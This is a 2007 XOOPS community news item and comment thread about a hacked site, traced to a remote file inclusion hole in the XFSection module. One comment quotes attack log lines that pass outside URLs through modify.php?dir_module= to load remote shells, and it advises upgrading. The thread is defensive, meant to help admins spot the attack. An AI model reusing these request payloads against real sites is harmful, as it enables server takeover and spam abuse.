Get XOOPS XOOPS FAQ Forums News Themes Modules
News World of XOOPS Developers Hacks Modules Themes YAXS Archive Submit News
XOOPS Giftshop XOOPS Blue Move
Share


XOOPS vs. Herko Coomans

Local Support

Make a donation

Please select an amount to donate


Do you want your username revealed with your donation?
Yes - List me as a Generous Donor
No - List my donation as from an Anonymous Donor


Search


Advanced Search

Twitter News

Cumulus Tag Cloud

admin Arabic banner block Christmas comments cumulus DayDawn dhsoft e-Commerce E-Learning Google GUI hacks instant-zero jQuery module news Nordic Olédrion oxygen PageRank security SEO simple-XOOPS sport tag Theme wiki xoops
more...

New Users

Registering user

# 117261

rheamad34

Welcome to XOOPS!

Archives

News Archives

Advertisement

XOOPS Code hosted on SourceForge

Easyhosting to consider withdrawal of support for Xoops

Posted by akitson on 2007/6/3 19:39:42 (9987 reads) | Posted on Security
Following a hack on one of our websites, the site hosters have claimed that the hack occured because of insecurity in the Xoops systems.

To quote Easyhosting

Quote:
I think it very likely that we would not host xoops any longer on any of our servers.


Now you have to take this with a little pinch of salt as the only hacks that have experienced by us have been on Easyhosting's servers. (Other sites are run on a different hosters.) Easyhosting have been asked to provide details (in detail) of the security breaches and the response is awaited. We might be waiting a long time.

In the meantime valentinewalton.co.uk and bbcb.co.uk (not effected yet but on the same hosters) need a fast and free home for 3-6 months while this stuff gets sorted.

Respond to this news:
Specific offers of help to akitson at bbcb dot co dot uk
Security help - post a comment - help others


Printer Friendly Page Send this Story to a Friend Create a PDF from the article


Bookmark this article at these sites

                   

The comments are owned by the poster. We aren't responsible for their content.

Sounds like an improperly configured server to me. If they have their user and file system permissions correctly configured, as well as the software, then directory listings, cross-account code execution and cross site scripting would not be possible.

As as fellow server admin, it sounds more like an issue of ignorance on their part than anything wrong with XOOPS.

On a more personal note, if there is anything I can do to help you, let me know. I have resources available on my personal hosting. It's not the fastest, but it will get you through until you can find a permanent home.
Posted: 2007/6/3 23:28 • Updated: 2007/6/3 23:28
JMorris
i think many of us have care about our XOOPS sites and want to know if they send you any response.

and i send you a PM
Posted: 2007/6/4 2:04 • Updated: 2007/6/4 2:04
irmtfan
I've offered to look after one of Atkinson's sites for him for a while - if my Bandwidth will take it ... I'd take both, but not sure if I've enough free resources
Posted: 2007/6/4 3:13 • Updated: 2007/6/4 3:13
davidl2
Quote:
it sounds more like an issue of ignorance on their part than anything wrong with XOOPS.

I agree. A good host would be able to qualify a statement regarding vulnerabilities of a particular web application. A knee-jerk reaction like that sounds like they don't really know what they're doing. Unless they come up with any concrete evidence, it's time to move.
Posted: 2007/6/4 4:08 • Updated: 2007/6/4 4:10
Peekay
@akitson i sent you a pm
Posted: 2007/6/4 5:08 • Updated: 2007/6/4 5:08
aph3x
Thanks Guys for your offers of space. I've got a home for one and Davidl2 has kindly offered space on his space at 3dPixelnet (where I have now got all my other sites, so it makes some sense to keep them together.)

As I get more info from easyhosting I'll share it.
Posted: 2007/6/4 6:40 • Updated: 2007/6/4 6:40
akitson
The security hole was found in XFSection. If you are running XFSection < 1.12 then you need to upgrade. Not sure how it's done yet.
Posted: 2007/6/8 0:52 • Updated: 2007/6/8 0:52
akitson
XFSection's developer suggests that users of the module switch to SmartFactory's Smartsection module. He provides upgrade info here:
http://linux2.ohwada.net/modules/smar ... category.php?categoryid=3
Posted: 2007/6/8 1:28 • Updated: 2007/6/8 1:28
gestroud
Yes, I think Atkinson was thinking of moving to this.

Atkinson - can you let Easyhosting know of the cause of that issue? Cheers.
Posted: 2007/6/8 2:21 • Updated: 2007/6/8 2:21
davidl2
Quote:
The security hole was found in XFSection.

Who found that, The Easyhosting techs?
Posted: 2007/6/8 5:42 • Updated: 2007/6/8 5:42
Peekay
No - Atkinson, the 3dPixelnet techs - and myself

The XFSection developer had fortunately fixed this issue a while ago.
Posted: 2007/6/8 5:48 • Updated: 2007/6/8 5:50
davidl2
To add to this:

If you are running XFSection then look in your site access logs for entries like these:

07.218.231.178 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php?dir_module=http://www.insanmistik.org/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

70.86.113.114 - - [08/Jun/2007:03:09:15 +0100] "GET /modules/xfsection/modify.php?dir_module=http://k52.jp/echo? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

208.67.252.215 - - [08/Jun/2007:03:15:12 +0100] "GET /modules/xfsection/modify.php?dir_module=http://b4ngs4t.com/echo?? HTTP/1.1" 403 490 "-" "libwww-perl/5.79"

65.98.89.146 - - [08/Jun/2007:03:19:52 +0100] "GET /modules/xfsection//modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.1" 403 505 "-" "libwww-perl/5.805"

59.106.13.148 - - [08/Jun/2007:03:28:51 +0100] "GET /modules/xfsection/modify.php?dir_module=http://b4ngs4t.com/echo?? HTTP/1.1" 403 486 "-" "libwww-perl/5.79"

The important bit is /modules/xfsection/modify.php?dir_module=

followed by a random URL 'libwww-perl' as a user-agent may also be relevent.

This is apparently letting in r57shells (that's what I'm told, the only reference I can find is in German here http://www.phpforum.de/archiv_57320_P ... en@@blocken_anzeigen.html
)

If you have these types of entries then you are being hacked and the server you are running on is being used to send junk spam mail, potentially in the tens of thousands.

Upgrade to SmartSection is the answer.

I'm going to contact GIJOE to see if he can add something to XOOPS Protector to stop this sort of thing happening.
Posted: 2007/6/8 7:24 • Updated: 2007/6/8 7:26
akitson